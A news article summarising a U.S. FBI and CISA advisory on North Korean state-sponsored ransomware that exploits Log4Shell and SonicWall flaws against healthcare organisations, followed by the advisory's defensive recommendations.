U.S. agencies are warning healthcare organizations and other critical infrastructure organizations to be aware of recent activity from a North Korean nation-state ransomware group that is leveraging older vulnerabilities–including Log4Shell– to gain access into victim environments.
The advisory from the FBI, U.S. Cybersecurity and Infrastructure Security Agency and other agencies gives an overview of the Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware, which has been targeting healthcare and public health organizations, as well as other critical infrastructure organizations.
According to the agencies, the cryptocurrency ransom payments are being used to fund DPRK priorities and objectives, including cyber operations against U.S. and South Korean defense agencies and industries.
The advisory supplements previous reports on malicious DPRK campaigns, including the Maui and H0lyGh0st ransomware.
Agencies say the DPRK actors gain initial access to victim environments and escalate privileges using known vulnerabilities such as Log4Shell and remote code execution bugs in unpatched SonicWall SMA 100 appliances.
According to the advisory, after initial access, DPRK actors use staged payloads to perform reconnaissance activities, upload and download additional files and executables, and execute shell commands. The staged malware is also responsible for collecting victim information and sending it to the remote host controlled by the actors.
The actors use privately deployed ransomware, such as Maui and H0lyGh0st, but also use publicly available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom. In some cases, the DPRK actors pretend to be other ransomware groups, such as REvil.
In addition to taking basic steps to prepare for and mitigate ransomware incidents such as keeping regular and secure backups, creating an incident response plans, keeping systems updated and practicing other good cyber hygiene, organizations in the healthcare sector are urged to:
- Limit access to data by authenticating and encrypting connections (e.g., using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections) with network services, Internet of Things (IoT) medical devices, and the electronic health record system.
- Implement the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts which grant excessive system administration privileges.
- Turn off weak or unnecessary network device management interfaces, such as Telnet, SSH, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
- Protect stored data by masking the permanent account number (PAN) when displayed and rendering it unreadable when stored—through cryptography, for example.
- Secure the collection, storage, and processing practices for personally identifiable information (PII)/protected health information (PHI), per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures could prevent the introduction of malware to the system.
- Secure PII/ PHI at collection points and encrypt the data at rest and in transit using technologies, such as TLS. Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available.
- Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
- Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
- Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
Read the advisory for more information.